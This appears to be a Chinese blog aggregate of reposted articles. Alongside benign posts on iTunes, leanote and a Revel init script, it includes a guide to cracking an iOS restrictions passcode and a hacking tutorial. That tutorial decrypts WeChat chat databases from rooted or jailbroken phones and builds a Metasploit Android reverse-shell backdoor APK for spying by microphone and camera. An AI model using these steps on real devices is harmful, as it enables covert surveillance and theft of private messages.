故事接着第四章。
作者: WteRry
点我下载内测版,需要信任企业证书,存档备用,已测试可用。
2017新年快乐
感谢16有你,希望17前行
September 2, 2016 at 09:40PM
查看原文
对于一些粗心的朋友,如果忘记了你的iOS设备的限制密码,是一件非常头疼的事。通常都需要重新刷机才可以解决此问题,但是,现在有种方法可以无需刷机,破解掉访问密码,具体教程如下。
注意:经测试90%可行,同时修改系统文件可能导致白苹果,建议备份资料再操作。
1.用PP助手等第三方工具打开目录/var/mobile/Library/Preferences
2.找到并且打开com.apple.restrictionspassword.plist
以我的文件为例:
在网站里面:
RestrictionsPasswordKey: 填写的是 C3GFN1bcIGg+j0euhIZRkJLHKrQ=
[size=13.3333px]RestrictionsPasswordSalt:填写的是 OO2sTQ==
[size=13.3333px]
当然,这两个都会不一样的。
最后就是点击Search for Code 就OK了。
破解出来之后会有弹窗提示,同时页面也会出现提示
FOUND!! Passcode: 4506[size=13.3333px] with salt m0twcg==
[size=13.3333px] creates base64 key:j8dOCBHHwwwfGR7fxXu3H1V+3D8=
而我的访问限制密码就是4506
在网站里面:
RestrictionsPasswordKey: 填写的是 C3GFN1bcIGg+j0euhIZRkJLHKrQ=
[size=13.3333px]RestrictionsPasswordSalt:填写的是 OO2sTQ==
[size=13.3333px]
当然,这两个都会不一样的。
最后就是点击Search for Code 就OK了。
破解出来之后会有弹窗提示,同时页面也会出现提示
FOUND!! Passcode: 4506[size=13.3333px] with salt m0twcg==
[size=13.3333px] creates base64 key:j8dOCBHHwwwfGR7fxXu3H1V+3D8=
而我的访问限制密码就是4506
Sent By IFTTT
解决win10 64位安装itunes出错的正确方法
最近重装了win10,然后安装itunes出错,提示 上网查找原因,很多帖子说要先安装windows inst… 继续阅读解决win10 64位安装itunes出错的正确方法
daemon化leanote
之前说到安装好leanote,可以开机自动运行了,但是控制起来很不方便,于是就找到了一个脚本,就是前一篇日志 … 继续阅读daemon化leanote
iOS9.33越狱来了
如题,扩散吧
July 24, 2016 at 12:54PM
查看原文
Go Revel init script for CentOS 6.x
Go Revel init script for CentOS 6.x:
centos6-init-script.sh
#!/bin/bash # revel-app go/revel daemon # chkconfig: 345 20 80 # description: revel-app daemon # processname: revel-app NAME="revel-app" PIDFILE=/var/run/$NAME.pid DAEMON_PATH="/opt/revel-app" DAEMON="/bin/bash run.sh" DAEMON_OPTS="" case "$1" in start) printf "%-50s" "Starting $NAME..." if [ -f $PIDFILE ]; then echo "Already running? (pid=`cat $PIDFILE`)" else cd $DAEMON_PATH PID=`$DAEMON $DAEMON_OPTS > /dev/null 2>&1 & echo $!` echo "$PID" > $PIDFILE echo "Ok. (pid=$PID)" fi ;; status) printf "%-50s" "Checking $NAME..." if [ -f $PIDFILE ]; then PID=`cat $PIDFILE` if [ -z "`ps axf | grep ${PID} | grep -v grep`" ]; then printf "%s\n" "Process dead but pidfile exists." else echo "Running. (pid=$PID)" fi else printf "%s\n" "Service not running." fi ;; stop) printf "%-50s" "Stopping $NAME" if [ -f $PIDFILE ]; then PID=`cat $PIDFILE` pkill -9 -P $PID printf "%s\n" "Ok." rm -f $PIDFILE else printf "%s\n" "Already stoppied? $PIDFILE not found." fi ;; restart) $0 stop sleep 5 $0 start ;; *) echo "Usage: $0 {status|start|stop|restart}" exit 1 esac
Sent By IFTTT
自建leanote成功
由于Evernote对免费用户越来越不厚道,已经转用微软的OneNote了,但是OneNote的同步速度很慢。… 继续阅读自建leanote成功
July 3, 2016 at 10:49AM
查看原文
在这篇文章中我们将讨论如何获取安卓、苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制。
文章比较基础、可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣。
“如何获取Android、iPhone手机上的微信聊天记录? ”
条件:
安卓设备已获取root权限,安装SSHDroid(通过ssh、ftp连接手机)
Apple设备越狱,安装OpenSSH插件
1 安卓:
很多安卓手机的用户都会遇到这么一个尴尬的问题:手机用久了就不知不觉变得慢了,最后慢到什么都迟钝了。为了解决这个问题和大多数人一样我选择了root设备。
安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如,你在安卓设备上安装了微信,那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。
Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下,微信App文件存放路径为:/data/data/http://ift.tt/29hVuJI
首先通过FTP把文件down到本地:
以34位编码(类似于乱码)命名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db
用数据库管理器打开:提示加密或者不是数据库文件
这里可以用windows环境下的SQLite Database Browser浏览器打开:
提示输入密码:
那么,加密数据库使用的密码是什么呢?我们又该如何获取到这个密码?通过上网查资料了解到:微信采用手机的IMEI值和微信UIN值的组合来对数据进行加密。
微信账号uin:即user information 微信用户信息识别码,获取微信UIN的方式有两种:
1.通过微信app的“system_config_prefs.xml”配置文件获取微信账号uin;
2.通过抓取WEB版微信聊天的数据包获取到uin。
1.1 App 配置文件
find / -name “system_config_prefs.xml”
/data/data/http://ift.tt/298M0wz |
cat /data/data/http://ift.tt/298M0wz | grep uin |
<int name=”default_uin” value=”146****21″ /> |
1.2 谷歌chrome浏览器登陆WEB版微信:
登陆后新建窗口并访问chrome://net-internals/#events
发送信息 抓包 find uin值
uin:146****21
通过上述两种方法找到的uin值是相同的。
安卓拨号界面输入*#06#获得手机IMEI码:354**********85
SIM值+uin值组合即为146****21354**********85
md5: http://ift.tt/298MpPD 左侧加密
得到32位小写md5值:a1edf9f5********************b5e5 取其前七位:a1edf9f输入到sql浏览器中。
Linux、Mac用户也可以在终端执行:
echo -n “146****21354**********85” | md5sum | cut -c -7 |
成功打开微信的数据库文件:
Wechat2txt.py:gist.github.com
import os import sys import re import hashlib import csv import time import locale import getopt def get_db(): def get_default_uin(): def get_device_ID(): def get_md5(): def parse_msgcsv(msgcsv): def get_names(chat): def oo(chat, name=”): def IIIii1II1II(dbn, key=”): def decrypt(dbn, key=”, table=’message’): def wechat2txt(names=[]): help_msg = ”’Usage: wechat2txt.py [OPTIONS] [NAME]… OPTIONS: def main(): if __name__ == “__main__”: |
2 苹果:
Apple设备越狱后可通过Cydia安装各种小插件,通常情况我会安装OpenSSH来使自己能通过终端连接到Apple设备中,并使用sftp传输文件:
iOS中,应用文件夹以hash值命名,要导出微信、QQ的聊天记录其难度相对安卓来说稍微复杂很多。
在实际操作中我们可以通过巧用Linux命令(find、grep、xargs)来绕过这些坑。
find /var/mobile/Containers/Data -name “MM.sqlite”
mkdir /cache |
在越狱iOS窃取隐私可参考:帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息 一文
3 在安卓终端植入后门
3.1 实验环境
Kali Linux(Hack):192.168.31.213
Android(靶机):192.168.31.118
3.2生成后门文件:
cd Desktop msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk |
3.3 运行metasploit控制台
msfconsole
use exploit/multi/handler |
3.4 安装&运行后门App
后门能进行什么操作?我们来看看usage:
meterpreter > help
Core Commands Command Description Stdapi: File system Commands Command Description Stdapi: Networking Commands Command Description Stdapi: System Commands Command Description Stdapi: Webcam Commands Command Description |
record_mic 通过手机麦克风进行窃听、录音;
webcam_list 列出安卓设备的所有摄像头;
webcam_snap 通过摄像头进行偷拍…
等等
4 演示视频
5 APK后门分析:
把apk放到apk分析工具(apkStudio、Bytecodeviewer)进行解包,我们来看看后门App的源码:
(apkStudio)
在smali/com/metasploit/stage/MainActivity.smali中我们可以找到后门服务器的ip端口配置:
(apkStudio)
(Bytecodeviewer)
(Bytecodeviewer)
6 预防&安全建议
安卓:从可信来源下载应用程序,避免感染恶意程序;在移动充电桩充电前及时关闭USB调试。
苹果:越狱后及时修改root密码,避免使用默认密码、弱口令。
7 文中工具下载地址:
SQLite Database Browser:http://ift.tt/298MgvC
SSHDroid:http://ift.tt/29hVFV7
0×08 参考&感谢
How To Decrypt WeChat EnMicroMsg.db Database?
Android微信数据导出
微信聊天记录分析
A look at WeChat security
http://ift.tt/1ruAind
帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息
Hacking Android Smartphone Tutorial using Metasploit
【纪念青葱岁月】那些年我们一起追过黑客网站!
比特币赞助打赏地址:13sbdFRyFBeqmXY9GJQf66s5cwmvLvWaAD
长按公众号,可“置顶”
———————————-
要闻、干货、原创、专业
关注“黑白之道” 微信:i77169
华夏黑客同盟我们坚持,自由,免费,共享!
Sent By IFTTT